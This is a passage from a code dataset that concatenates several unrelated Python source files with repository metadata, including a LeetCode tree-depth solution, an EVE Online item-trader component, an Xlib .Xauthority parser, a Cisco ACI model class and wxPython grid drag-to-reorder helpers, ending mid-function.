for _ in range(len(queue)):
root = queue.pop() # list.pop(0)
temp.append(root.val)
if root.left:
queue.appendleft(root.left)
if root.right:
queue.appendleft(root.right)
cnt += 1
return cnt
def main():
root = TreeNode(3)
n2 = TreeNode(9)
n3 = TreeNode(20)
n4 = TreeNode(15)
n5 = TreeNode(7)
root.setLeftNode(n2)
root.setRightNode(n3)
n3.setLeftNode(n4)
n3.setRightNode(n5)
solution = Solution()
ret = solution.maxDepth2(root)
print(ret)
'''104. Maximum Depth of Binary Tree
Given a binary tree, find its maximum depth.
The maximum depth is the number of nodes along the longest path from the root node down to the farthest leaf node.
Note: a leaf is a node with no children.
Example:
Given the binary tree [3,9,20,null,null,15,7],
    3
   / \
  9  20
    /  \
   15   7
return its maximum depth, 3.
Source: 力扣 (LeetCode)
Link: https://leetcode-cn.com/problems/maximum-depth-of-binary-tree
Copyright belongs to 领扣网络 (LeetCode China). Commercial reprints require official authorization; non-commercial reprints must cite the source.
'''
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
79800080c4d9f0483f339e63026999badf2cd752 | 4522fc52bc43654aadd30421a75bae00a09044f0 | /alfa/diannad.py | f52594100e43207f34f304fe117f59a727bc3de3 | [] | no_license | qesoalpe/anelys | 1edb8201aa80fedf0316db973da3a58b67070fca | cfccaa1bf5175827794da451a9408a26cd97599d | refs/heads/master | 2020-04-07T22:39:35.344954 | 2018-11-25T05:23:21 | 2018-11-25T05:23:21 | 158,779,332 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 779 | py | from sarah.acp_bson import Recipient
from base64 import b64decode
import json
ff = open('dianna_file', 'rb')
config = json.loads(b64decode(ff.read()).decode())
ff.close()
def handle_request(msg):
if 'request_type' in msg:
if msg['request_type'] == 'get':
if msg['get'] == 'dianna/local_device':
return {'local_device': config['local_device']}
dict_handle_msg = dict()
dict_handle_msg['request'] = handle_request
def read_msg(msg):
if 'type_message' in msg and msg['type_message'] in dict_handle_msg:
return dict_handle_msg[msg['type_message']](msg)
if __name__ == '__main__':
print("I'm citlali daemon.")
recipient = Recipient()
recipient.prepare('citlali', read_msg)
recipient.begin_receive_forever()
| [
"[email protected]"
] | |
5798d06030285a366239004b9efbbf2e57eedf93 | 5864e86954a221d52d4fa83a607c71bacf201c5a | /spacecomponents/server/components/itemtrader.py | d137971475932934dac6aa414f5db1d9685da1b9 | [] | no_license | connoryang/1v1dec | e9a2303a01e5a26bf14159112b112be81a6560fd | 404f2cebf13b311e754d45206008918881496370 | refs/heads/master | 2021-05-04T02:34:59.627529 | 2016-10-19T08:56:26 | 2016-10-19T08:56:26 | 71,334,417 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,402 | py | #Embedded file name: e:\jenkins\workspace\client_SERENITY\branches\release\SERENITY\packages\spacecomponents\server\components\itemtrader.py
from spacecomponents.common.components.component import Component
from spacecomponents.common.componentregistry import ExportCall
import evetypes
class ItemTrader(Component):
def __init__(self, itemTraderItemId, typeId, attributes, componentRegistry):
Component.__init__(self, itemTraderItemId, typeId, attributes, componentRegistry)
self.SubscribeToMessage('OnAddedToSpace', self.OnAddedToSpace)
def OnAddedToSpace(self, ballpark, spaceComponentDb):
self.tradeProcessor = TradeProcessor(ballpark, ballpark.inventory2, ballpark.inventoryMgr, self.itemID, self.attributes.inputItems, self.attributes.outputItems, self.attributes.interactionRange)
@ExportCall
def ProcessTrade(self, session):
return self.tradeProcessor.ProcessTrade(session.shipid, session.charid)
class TradeProcessor(object):
def __init__(self, ballpark, inventory2, inventoryMgr, itemTraderItemId, inputItems, outputItems, interactionRange):
self.ballpark = ballpark
self.inventory2 = inventory2
self.inventoryMgr = inventoryMgr
self.itemTraderItemId = itemTraderItemId
self.inputItems = inputItems
self.outputItems = outputItems
self.interactionRange = interactionRange
self.requiredCapacity = self.GetCapacityForItems(outputItems) - self.GetCapacityForItems(inputItems)
def ProcessTrade(self, shipId, ownerId):
with self.inventory2.LockedItemAndSubItems(shipId):
self.CheckDistance(shipId)
ship = self.inventoryMgr.GetInventoryFromIdEx(shipId, -1)
self.CheckCargoCapacity(ship)
cargoItems = ship.List(const.flagCargo)
itemsForRemoval = self._GetItemsForTrade(cargoItems)
if itemsForRemoval:
self._TakeItems(shipId, itemsForRemoval)
self._GiveItems(shipId, ownerId)
return True
return False
def _GetItemsForTrade(self, cargoItems):
itemsForTrade = {}
for requiredTypeId, requiredQuantity in self.inputItems.iteritems():
quantityLeft = self._GetItemsForTradeFromCargo(cargoItems, itemsForTrade, requiredTypeId, requiredQuantity)
if quantityLeft != 0:
return {}
return itemsForTrade
def _GetItemsForTradeFromCargo(self, cargoItems, itemsForTrade, requiredTypeId, requiredQuantity):
quantityLeft = requiredQuantity
for item in cargoItems:
if item.typeID == requiredTypeId:
quantity = min(quantityLeft, item.quantity)
itemsForTrade[item.itemID] = quantity
quantityLeft -= quantity
if quantityLeft == 0:
break
return quantityLeft
def _TakeItems(self, shipId, itemsForRemoval):
for itemId, quantityForRemoval in itemsForRemoval.iteritems():
self.inventory2.MoveItem(itemId, shipId, const.locationJunkyard, qty=quantityForRemoval)
def _GiveItems(self, shipId, ownerId):
for typeId, quantityForAdd in self.outputItems.iteritems():
self.inventory2.AddItem2(typeId, ownerId, shipId, qty=quantityForAdd, flag=const.flagCargo)
def GetCapacityForItems(self, items):
capacity = 0
for typeId, quantity in items.iteritems():
typeVolume = evetypes.GetVolume(typeId)
capacity += quantity * typeVolume
return capacity
def CheckCargoCapacity(self, ship):
shipCapacity = ship.GetCapacity(flag=const.flagCargo)
availableCapacity = shipCapacity.capacity - shipCapacity.used
if availableCapacity < self.requiredCapacity:
raise UserError('NotEnoughCargoSpace', {'available': shipCapacity.capacity - shipCapacity.used,
'volume': self.requiredCapacity})
def CheckDistance(self, shipId):
actualDistance = self.ballpark.GetSurfaceDist(self.itemTraderItemId, shipId)
if actualDistance > self.interactionRange:
typeName = evetypes.GetName(self.inventory2.GetItem(self.itemTraderItemId).typeID)
raise UserError('TargetNotWithinRange', {'targetGroupName': typeName,
'desiredRange': self.interactionRange,
'actualDistance': actualDistance})
| [
"[email protected]"
] | |
b018c86a7c6c80f8fa48f8ac5dcca77ac0fc80bc | d8c50195fe04a09bd98e12f0b18a84dbe4a3dfe2 | /zeus/tasks/process_artifact.py | a16482e42a4078a95b72babb1012eb62ace1e806 | [
"Apache-2.0"
] | permissive | keegancsmith/zeus | 44eeac0e9c99635f21bfa7ec744c84be7b40525e | e7bfe3db564ad1bbf449d8197f7d663fe41dd60a | refs/heads/master | 2021-09-04T04:34:47.747175 | 2018-01-12T17:24:11 | 2018-01-12T21:55:31 | 117,591,379 | 0 | 0 | null | 2018-01-15T20:19:57 | 2018-01-15T20:19:57 | null | UTF-8 | Python | false | false | 2,120 | py | from flask import current_app
from zeus import auth
from zeus.artifacts import manager as default_manager
from zeus.config import celery, db
from zeus.constants import Result
from zeus.models import Artifact, Job, Status
from zeus.utils import timezone
from .aggregate_job_stats import aggregate_build_stats_for_job
@celery.task(max_retries=None, autoretry_for=(Exception,), acks_late=True)
def process_artifact(artifact_id, manager=None, force=False, **kwargs):
artifact = Artifact.query.unrestricted_unsafe().get(artifact_id)
if artifact is None:
current_app.logger.error('Artifact %s not found', artifact_id)
return
if artifact.status == Status.finished and not force:
current_app.logger.info(
'Skipping artifact processing (%s) - already marked as finished', artifact_id)
return
artifact.status = Status.in_progress
artifact.date_started = timezone.now()
db.session.add(artifact)
db.session.flush()
auth.set_current_tenant(auth.Tenant(
repository_ids=[artifact.repository_id]))
job = Job.query.get(artifact.job_id)
if job.result == Result.aborted:
current_app.logger.info(
'Skipping artifact processing (%s) - Job aborted', artifact_id)
artifact.status = Status.finished
db.session.add(artifact)
db.session.commit()
return
if artifact.file:
if manager is None:
manager = default_manager
try:
with db.session.begin_nested():
manager.process(artifact)
except Exception:
current_app.logger.exception(
'Unrecoverable exception processing artifact %s: %s', artifact.job_id, artifact
)
else:
current_app.logger.info(
'Skipping artifact processing (%s) due to missing file', artifact_id)
artifact.status = Status.finished
artifact.date_finished = timezone.now()
db.session.add(artifact)
db.session.commit()
# we always aggregate results to avoid locking here
aggregate_build_stats_for_job.delay(job_id=job.id)
| [
"[email protected]"
] | |
4e71953ea5d17920c540d29e944877d704f20cc5 | 4ee4c2cafad449dd60032630bdd249e63d70b5ac | /plugins/xevents/Xlib/xauth.py | 4755b353f1bc01bc186ea50603860a9c1df9ddec | [
"MIT",
"GPL-2.0-only"
] | permissive | rrojasPy/TurtleBots.activity | 4c44ed90b1aadbd0788cdb091fc647deac28d8e8 | c18e64cc817b2bd8d8cd80a538ff703f580bbe42 | refs/heads/master | 2022-10-20T20:46:27.304452 | 2020-06-17T15:57:11 | 2020-06-17T15:57:11 | 273,014,877 | 0 | 1 | MIT | 2020-06-17T15:57:12 | 2020-06-17T15:44:15 | null | UTF-8 | Python | false | false | 4,168 | py | # $Id: xauth.py,v 1.5 2007/06/10 14:11:58 mggrant Exp $
#
# Xlib.xauth -- ~/.Xauthority access
#
# Copyright (C) 2000 Peter Liljenberg <[email protected]>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
import os
import struct
from Xlib import X, error
FamilyInternet = X.FamilyInternet
FamilyDECnet = X.FamilyDECnet
FamilyChaos = X.FamilyChaos
FamilyLocal = 256
class Xauthority:
def __init__(self, filename = None):
if filename is None:
filename = os.environ.get('XAUTHORITY')
if filename is None:
try:
filename = os.path.join(os.environ['HOME'], '.Xauthority')
except KeyError:
raise error.XauthError(
'$HOME not set, cannot find ~/.Xauthority')
try:
raw = open(filename, 'rb').read()
except IOError, err:
raise error.XauthError('~/.Xauthority: %s' % err)
self.entries = []
# entry format (all shorts in big-endian)
# short family;
# short addrlen;
# char addr[addrlen];
# short numlen;
# char num[numlen];
# short namelen;
# char name[namelen];
# short datalen;
# char data[datalen];
n = 0
try:
while n < len(raw):
family, = struct.unpack('>H', raw[n:n+2])
n = n + 2
length, = struct.unpack('>H', raw[n:n+2])
n = n + length + 2
addr = raw[n - length : n]
length, = struct.unpack('>H', raw[n:n+2])
n = n + length + 2
num = raw[n - length : n]
length, = struct.unpack('>H', raw[n:n+2])
n = n + length + 2
name = raw[n - length : n]
length, = struct.unpack('>H', raw[n:n+2])
n = n + length + 2
data = raw[n - length : n]
if len(data) != length:
break
self.entries.append((family, addr, num, name, data))
except struct.error, e:
print "Xlib.xauth: warning, failed to parse part of xauthority file (%s), aborting all further parsing" % filename
#pass
if len(self.entries) == 0:
print "Xlib.xauth: warning, no xauthority details available"
# raise an error? this should get partially caught by the XNoAuthError in get_best_auth..
def __len__(self):
return len(self.entries)
def __getitem__(self, i):
return self.entries[i]
def get_best_auth(self, family, address, dispno,
types = ( "MIT-MAGIC-COOKIE-1", )):
"""Find an authentication entry matching FAMILY, ADDRESS and
DISPNO.
The name of the auth scheme must match one of the names in
TYPES. If several entries match, the first scheme in TYPES
will be choosen.
If an entry is found, the tuple (name, data) is returned,
otherwise XNoAuthError is raised.
"""
num = str(dispno)
matches = {}
for efam, eaddr, enum, ename, edata in self.entries:
if efam == family and eaddr == address and num == enum:
matches[ename] = edata
for t in types:
try:
return (t, matches[t])
except KeyError:
pass
raise error.XNoAuthError((family, address, dispno))
| [
"[email protected]"
] | |
3db1c085e8a1c20d8814e3cf539505d24c6036e6 | 3c000380cbb7e8deb6abf9c6f3e29e8e89784830 | /venv/Lib/site-packages/cobra/modelimpl/reln/targetdeleteargs.py | 1ed2258f3814fe86e5b5b2306d6d6bd97c64e2a3 | [] | no_license | bkhoward/aciDOM | 91b0406f00da7aac413a81c8db2129b4bfc5497b | f2674456ecb19cf7299ef0c5a0887560b8b315d0 | refs/heads/master | 2023-03-27T23:37:02.836904 | 2021-03-26T22:07:54 | 2021-03-26T22:07:54 | 351,855,399 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,573 | py | # coding=UTF-8
# **********************************************************************
# Copyright (c) 2013-2020 Cisco Systems, Inc. All rights reserved
# written by zen warriors, do not modify!
# **********************************************************************
from cobra.mit.meta import ClassMeta
from cobra.mit.meta import StatsClassMeta
from cobra.mit.meta import CounterMeta
from cobra.mit.meta import PropMeta
from cobra.mit.meta import Category
from cobra.mit.meta import SourceRelationMeta
from cobra.mit.meta import NamedSourceRelationMeta
from cobra.mit.meta import TargetRelationMeta
from cobra.mit.meta import DeploymentPathMeta, DeploymentCategory
from cobra.model.category import MoCategory, PropCategory, CounterCategory
from cobra.mit.mo import Mo
# ##################################################
class TargetDeleteArgs(Mo):
"""
"""
meta = ClassMeta("cobra.model.reln.TargetDeleteArgs")
meta.moClassName = "relnTargetDeleteArgs"
meta.rnFormat = "tdel-[%(resolverDn)s]"
meta.category = MoCategory.REGULAR
meta.label = "None"
meta.writeAccessMask = 0x1
meta.readAccessMask = 0x1
meta.isDomainable = False
meta.isReadOnly = True
meta.isConfigurable = False
meta.isDeletable = False
meta.isContextRoot = False
meta.parentClasses.add("cobra.model.top.Root")
meta.rnPrefixes = [
('tdel-', True),
]
prop = PropMeta("str", "childAction", "childAction", 4, PropCategory.CHILD_ACTION)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("deleteAll", "deleteall", 16384)
prop._addConstant("deleteNonPresent", "deletenonpresent", 8192)
prop._addConstant("ignore", "ignore", 4096)
meta.props.add("childAction", prop)
prop = PropMeta("str", "dn", "dn", 1, PropCategory.DN)
prop.label = "None"
prop.isDn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("dn", prop)
prop = PropMeta("str", "lcOwn", "lcOwn", 9, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "local"
prop._addConstant("implicit", "implicit", 4)
prop._addConstant("local", "local", 0)
prop._addConstant("policy", "policy", 1)
prop._addConstant("replica", "replica", 2)
prop._addConstant("resolveOnBehalf", "resolvedonbehalf", 3)
meta.props.add("lcOwn", prop)
prop = PropMeta("str", "modTs", "modTs", 7, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "never"
prop._addConstant("never", "never", 0)
meta.props.add("modTs", prop)
prop = PropMeta("str", "resolverDn", "resolverDn", 179, PropCategory.REGULAR)
prop.label = "None"
prop.isConfig = True
prop.isAdmin = True
prop.isCreateOnly = True
prop.isNaming = True
meta.props.add("resolverDn", prop)
prop = PropMeta("str", "rn", "rn", 2, PropCategory.RN)
prop.label = "None"
prop.isRn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("rn", prop)
prop = PropMeta("str", "status", "status", 3, PropCategory.STATUS)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("created", "created", 2)
prop._addConstant("deleted", "deleted", 8)
prop._addConstant("modified", "modified", 4)
meta.props.add("status", prop)
prop = PropMeta("str", "targetClass", "targetClass", 181, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("targetClass", prop)
prop = PropMeta("str", "targetDn", "targetDn", 180, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("targetDn", prop)
prop = PropMeta("str", "targetRn", "targetRn", 182, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.range = [(0, 512)]
meta.props.add("targetRn", prop)
meta.namingProps.append(getattr(meta.props, "resolverDn"))
getattr(meta.props, "resolverDn").needDelimiter = True
def __init__(self, parentMoOrDn, resolverDn, markDirty=True, **creationProps):
namingVals = [resolverDn]
Mo.__init__(self, parentMoOrDn, markDirty, *namingVals, **creationProps)
# End of package file
# ##################################################
| [
"[email protected]"
] | |
0eee2867d2a4f3aca7a06bb5468124d94ef182fe | 1e263d605d4eaf0fd20f90dd2aa4174574e3ebce | /components/ally-utilities/__setup__/ally_utilities/logging.py | b8a479b38eb8e2357cf75e837ffe1b544a61d068 | [] | no_license | galiminus/my_liveblog | 698f67174753ff30f8c9590935d6562a79ad2cbf | 550aa1d0a58fc30aa9faccbfd24c79a0ceb83352 | refs/heads/master | 2021-05-26T20:03:13.506295 | 2013-04-23T09:57:53 | 2013-04-23T09:57:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,296 | py | '''
Created on Nov 7, 2012
@package: ally utilities
@copyright: 2012 Sourcefabric o.p.s.
@license: http://www.gnu.org/licenses/gpl-3.0.txt
@author: Gabriel Nistor
Provides the logging configurations to be used for the application.
'''
from ally.container import ioc
# --------------------------------------------------------------------
@ioc.config
def format():
'''
The format to use for the logging messages more details can be found at "http://docs.python.org/3/library/logging.html"
in chapter "16.7.6. LogRecord attributes. Example:
"%(asctime)s %(levelname)s (%(threadName)s %(module)s.%(funcName)s %(lineno)d): %(message)s"
'''
return '%(module)s.%(funcName)s %(lineno)d: %(message)s'
@ioc.config
def debug_for():
'''
The list of packages or module patterns to provide debugging for, attention this is available only if the application
is not run with -O or -OO option
'''
return []
@ioc.config
def info_for():
'''The list of packages or module patterns to provide info for'''
return ['__deploy__', '__setup__']
@ioc.config
def warning_for():
'''The list of packages or module patterns to provide warnings for'''
return ['ally']
@ioc.config
def log_file():
''' The name of the log file '''
return 'app.log'
| [
"[email protected]"
] | |
aab67d9860ed9c71a79cb65ad39d549bc6174a0b | dca653bb975528bd1b8ab2547f6ef4f48e15b7b7 | /tags/wxPy-2.8.10.1/wxPython/wx/lib/gridmovers.py | f007fb1aea41c6a7e5279985ce8feed6a3d70262 | [] | no_license | czxxjtu/wxPython-1 | 51ca2f62ff6c01722e50742d1813f4be378c0517 | 6a7473c258ea4105f44e31d140ea5c0ae6bc46d8 | refs/heads/master | 2021-01-15T12:09:59.328778 | 2015-01-05T20:55:10 | 2015-01-05T20:55:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,861 | py | #----------------------------------------------------------------------------
# Name: GridColMover.py
# Purpose: Grid Column Mover Extension
#
# Author: Gerrit van Dyk (email: [email protected])
#
# Version 0.1
# Date: Nov 19, 2002
# RCS-ID: $Id$
# Licence: wxWindows license
#----------------------------------------------------------------------------
# 12/07/2003 - Jeff Grimmett ([email protected])
#
# o 2.5 Compatability changes
#
# 12/18/2003 - Jeff Grimmett ([email protected])
#
# o wxGridColMoveEvent -> GridColMoveEvent
# o wxGridRowMoveEvent -> GridRowMoveEvent
# o wxGridColMover -> GridColMover
# o wxGridRowMover -> GridRowMover
#
import wx
import wx.grid
#----------------------------------------------------------------------------
# event class and macros
#
# New style 12/7/03
#
wxEVT_COMMAND_GRID_COL_MOVE = wx.NewEventType()
wxEVT_COMMAND_GRID_ROW_MOVE = wx.NewEventType()
EVT_GRID_COL_MOVE = wx.PyEventBinder(wxEVT_COMMAND_GRID_COL_MOVE, 1)
EVT_GRID_ROW_MOVE = wx.PyEventBinder(wxEVT_COMMAND_GRID_ROW_MOVE, 1)
#----------------------------------------------------------------------------
class GridColMoveEvent(wx.PyCommandEvent):
def __init__(self, id, dCol, bCol):
wx.PyCommandEvent.__init__(self, id = id)
self.SetEventType(wxEVT_COMMAND_GRID_COL_MOVE)
self.moveColumn = dCol
self.beforeColumn = bCol
def GetMoveColumn(self):
return self.moveColumn
def GetBeforeColumn(self):
return self.beforeColumn
class GridRowMoveEvent(wx.PyCommandEvent):
def __init__(self, id, dRow, bRow):
wx.PyCommandEvent.__init__(self,id = id)
self.SetEventType(wxEVT_COMMAND_GRID_ROW_MOVE)
self.moveRow = dRow
self.beforeRow = bRow
def GetMoveRow(self):
return self.moveRow
def GetBeforeRow(self):
return self.beforeRow
#----------------------------------------------------------------------------
# graft new methods into the wxGrid class
def _ColToRect(self,col):
if self.GetNumberRows() > 0:
rect = self.CellToRect(0,col)
else:
rect = wx.Rect()
rect.height = self.GetColLabelSize()
rect.width = self.GetColSize(col)
for cCol in range(0,col):
rect.x += self.GetColSize(cCol)
rect.y = self.GetGridColLabelWindow().GetPosition()[1]
return rect
wx.grid.Grid.ColToRect = _ColToRect
def _RowToRect(self,row):
if self.GetNumberCols() > 0:
rect = self.CellToRect(row,0)
else:
rect = wx.Rect()
rect.width = self.GetRowLabelSize()
rect.height = self.GetRowSize(row)
for cRow in range(0,row):
rect.y += self.GetRowSize(cRow)
rect.x = self.GetGridRowLabelWindow().GetPosition()[0]
return rect
wx.grid.Grid.RowToRect = _RowToRect
#----------------------------------------------------------------------------
class ColDragWindow(wx.Window):
def __init__(self,parent,image,dragCol):
wx.Window.__init__(self,parent,-1, style=wx.SIMPLE_BORDER)
self.image = image
self.SetSize((self.image.GetWidth(),self.image.GetHeight()))
self.ux = parent.GetScrollPixelsPerUnit()[0]
self.moveColumn = dragCol
self.Bind(wx.EVT_PAINT, self.OnPaint)
def DisplayAt(self,pos,y):
x = self.GetPositionTuple()[0]
if x == pos:
self.Refresh() # Need to display insertion point
else:
self.MoveXY(pos,y)
def GetMoveColumn(self):
return self.moveColumn
def _GetInsertionInfo(self):
parent = self.GetParent()
sx = parent.GetViewStart()[0] * self.ux
sx -= parent.GetRowLabelSize()
x = self.GetPosition()[0]
w = self.GetSize()[0]
sCol = parent.XToCol(x + sx)
eCol = parent.XToCol(x + w + sx)
iPos = xPos = xCol = 99999
centerPos = x + sx + (w / 2)
for col in range(sCol,eCol + 1):
cx = parent.ColToRect(col)[0]
if abs(cx - centerPos) < iPos:
iPos = abs(cx - centerPos)
xCol = col
xPos = cx
if xCol < 0 or xCol > parent.GetNumberCols():
xCol = parent.GetNumberCols()
return (xPos - sx - x,xCol)
def GetInsertionColumn(self):
return self._GetInsertionInfo()[1]
def GetInsertionPos(self):
return self._GetInsertionInfo()[0]
def OnPaint(self,evt):
dc = wx.PaintDC(self)
w,h = self.GetSize()
dc.DrawBitmap(self.image, 0,0)
dc.SetPen(wx.Pen(wx.BLACK,1,wx.SOLID))
dc.SetBrush(wx.TRANSPARENT_BRUSH)
dc.DrawRectangle(0,0, w,h)
iPos = self.GetInsertionPos()
dc.DrawLine(iPos,h - 10, iPos,h)
class RowDragWindow(wx.Window):
def __init__(self,parent,image,dragRow):
wx.Window.__init__(self,parent,-1, style=wx.SIMPLE_BORDER)
self.image = image
self.SetSize((self.image.GetWidth(),self.image.GetHeight()))
self.uy = parent.GetScrollPixelsPerUnit()[1]
self.moveRow = dragRow
self.Bind(wx.EVT_PAINT, self.OnPaint)
def DisplayAt(self,x,pos):
y = self.GetPosition()[1]
if y == pos:
self.Refresh() # Need to display insertion point
else:
self.MoveXY(x,pos)
def GetMoveRow(self):
return self.moveRow
def _GetInsertionInfo(self):
parent = self.GetParent()
sy = parent.GetViewStart()[1] * self.uy
sy -= parent.GetColLabelSize()
y = self.GetPosition()[1]
h = self.GetSize()[1]
sRow = parent.YToRow(y + sy)
eRow = parent.YToRow(y + h + sy)
iPos = yPos = yRow = 99999
centerPos = y + sy + (h / 2)
for row in range(sRow,eRow + 1):
cy = parent.RowToRect(row)[1]
if abs(cy - centerPos) < iPos:
iPos = abs(cy - centerPos)
yRow = row
yPos = cy
if yRow < 0 or yRow > parent.GetNumberRows():
yRow = parent.GetNumberRows()
return (yPos - sy - y,yRow)
def GetInsertionRow(self):
return self._GetInsertionInfo()[1]
def GetInsertionPos(self):
return self._GetInsertionInfo()[0]
def OnPaint(self,evt):
dc = wx.PaintDC(self)
w,h = self.GetSize()
dc.DrawBitmap(self.image, 0,0)
dc.SetPen(wx.Pen(wx.BLACK,1,wx.SOLID))
dc.SetBrush(wx.TRANSPARENT_BRUSH)
dc.DrawRectangle(0,0, w,h)
iPos = self.GetInsertionPos()
dc.DrawLine(w - 10,iPos, w,iPos)
#----------------------------------------------------------------------------
class GridColMover(wx.EvtHandler):
def __init__(self,grid):
wx.EvtHandler.__init__(self)
self.grid = grid
self.lwin = grid.GetGridColLabelWindow()
self.lwin.PushEventHandler(self)
self.colWin = None
self.ux = self.grid.GetScrollPixelsPerUnit()[0]
self.startX = -10
self.cellX = 0
self.didMove = False
self.isDragging = False
self.Bind(wx.EVT_MOTION, self.OnMouseMove)
self.Bind(wx.EVT_LEFT_DOWN, self.OnPress)
self.Bind(wx.EVT_LEFT_UP, self.OnRelease)
def OnMouseMove(self,evt):
if not self.isDragging:
evt.Skip()
else:
_rlSize = self.grid.GetRowLabelSize()
if abs(self.startX - evt.m_x) >= 3 \
and abs(evt.m_x - self.lastX) >= 3:
self.lastX = evt.m_x
self.didMove = True
sx,y = self.grid.GetViewStart()
w,h = self.lwin.GetClientSize()
x = sx * self.ux
if (evt.m_x + x) < x:
x = evt.m_x + x
elif evt.m_x > w:
x += evt.m_x - w
if x < 1: x = 0
else: x /= self.ux
if x != sx:
if wx.Platform == '__WXMSW__':
self.colWin.Show(False)
self.grid.Scroll(x,y)
x,y = self.lwin.ClientToScreenXY(evt.m_x,0)
x,y = self.grid.ScreenToClientXY(x,y)
if not self.colWin.IsShown():
self.colWin.Show(True)
px = x - self.cellX
if px < 0 + _rlSize: px = 0 + _rlSize
if px > w - self.colWin.GetSize()[0] + _rlSize:
px = w - self.colWin.GetSize()[0] + _rlSize
self.colWin.DisplayAt(px,y)
return
def OnPress(self,evt):
self.startX = self.lastX = evt.m_x
_rlSize = self.grid.GetRowLabelSize()
sx = self.grid.GetViewStart()[0] * self.ux
sx -= _rlSize
px,py = self.lwin.ClientToScreenXY(evt.m_x,evt.m_y)
px,py = self.grid.ScreenToClientXY(px,py)
if self.grid.XToEdgeOfCol(px + sx) != wx.NOT_FOUND:
evt.Skip()
return
self.isDragging = True
self.didMove = False
col = self.grid.XToCol(px + sx)
rect = self.grid.ColToRect(col)
self.cellX = px + sx - rect.x
size = self.lwin.GetSize()
rect.y = 0
rect.x -= sx + _rlSize
rect.height = size[1]
colImg = self._CaptureImage(rect)
self.colWin = ColDragWindow(self.grid,colImg,col)
self.colWin.Show(False)
self.lwin.CaptureMouse()
evt.Skip()
def OnRelease(self,evt):
if self.isDragging:
self.lwin.ReleaseMouse()
self.colWin.Show(False)
self.isDragging = False
if not self.didMove:
px = self.lwin.ClientToScreenXY(self.startX,0)[0]
px = self.grid.ScreenToClientXY(px,0)[0]
sx = self.grid.GetViewStart()[0] * self.ux
sx -= self.grid.GetRowLabelSize()
col = self.grid.XToCol(px+sx)
if col != wx.NOT_FOUND:
self.grid.SelectCol(col,evt.m_controlDown)
return
else:
bCol = self.colWin.GetInsertionColumn()
dCol = self.colWin.GetMoveColumn()
wx.PostEvent(self,
GridColMoveEvent(self.grid.GetId(), dCol, bCol))
self.colWin.Destroy()
evt.Skip()
def _CaptureImage(self,rect):
bmp = wx.EmptyBitmap(rect.width,rect.height)
memdc = wx.MemoryDC()
memdc.SelectObject(bmp)
dc = wx.WindowDC(self.lwin)
memdc.Blit(0,0, rect.width, rect.height, dc, rect.x, rect.y)
memdc.SelectObject(wx.NullBitmap)
return bmp
class GridRowMover(wx.EvtHandler):
def __init__(self,grid):
wx.EvtHandler.__init__(self)
self.grid = grid
self.lwin = grid.GetGridRowLabelWindow()
self.lwin.PushEventHandler(self)
self.rowWin = None
self.uy = self.grid.GetScrollPixelsPerUnit()[1]
self.startY = -10
self.cellY = 0
self.didMove = False
self.isDragging = False
self.Bind(wx.EVT_MOTION, self.OnMouseMove)
self.Bind(wx.EVT_LEFT_DOWN, self.OnPress)
self.Bind(wx.EVT_LEFT_UP, self.OnRelease)
def OnMouseMove(self,evt):
if not self.isDragging:
evt.Skip()
else:
_clSize = self.grid.GetColLabelSize()
if abs(self.startY - evt.m_y) >= 3 \
and abs(evt.m_y - self.lastY) >= 3:
self.lastY = evt.m_y
self.didMove = True
x,sy = self.grid.GetViewStart()
w,h = self.lwin.GetClientSizeTuple()
y = sy * self.uy
if (evt.m_y + y) < y:
y = evt.m_y + y
elif evt.m_y > h:
y += evt.m_y - h
if y < 1:
y = 0
else:
y /= self.uy
if y != sy:
if wx.Platform == '__WXMSW__':
self.rowWin.Show(False)
self.grid.Scroll(x,y)
x,y = self.lwin.ClientToScreenXY(0,evt.m_y)
x,y = self.grid.ScreenToClientXY(x,y)
if not self.rowWin.IsShown():
self.rowWin.Show(True)
py = y - self.cellY
if py < 0 + _clSize:
py = 0 + _clSize
if py > h - self.rowWin.GetSize()[1] + _clSize:
py = h - self.rowWin.GetSize()[1] + _clSize
self.rowWin.DisplayAt(x,py)
return
def OnPress(self,evt):
self.startY = self.lastY = evt.m_y
_clSize = self.grid.GetColLabelSize()
sy = self.grid.GetViewStart()[1] * self.uy
sy -= _clSize
px,py = self.lwin.ClientToScreenXY(evt.m_x,evt.m_y)
px,py = self.grid.ScreenToClientXY(px,py)
if self.grid.YToEdgeOfRow(py + sy) != wx.NOT_FOUND:
evt.Skip()
return
self.isDragging = True
self.didMove = False
row = self.grid.YToRow(py + sy)
rect = self.grid.RowToRect(row)
self.cellY = py + sy - rect.y
size = self.lwin.GetSize()
rect.x = 0
rect.y -= sy + _clSize
rect.width = size[0]
rowImg = self._CaptureImage(rect)
self.rowWin = RowDragWindow(self.grid,rowImg,row)
self.rowWin.Show(False)
self.lwin.CaptureMouse()
evt.Skip()
def OnRelease(self,evt):
if self.isDragging:
self.lwin.ReleaseMouse()
self.rowWin.Show(False)
self.isDragging = False
if not self.didMove:
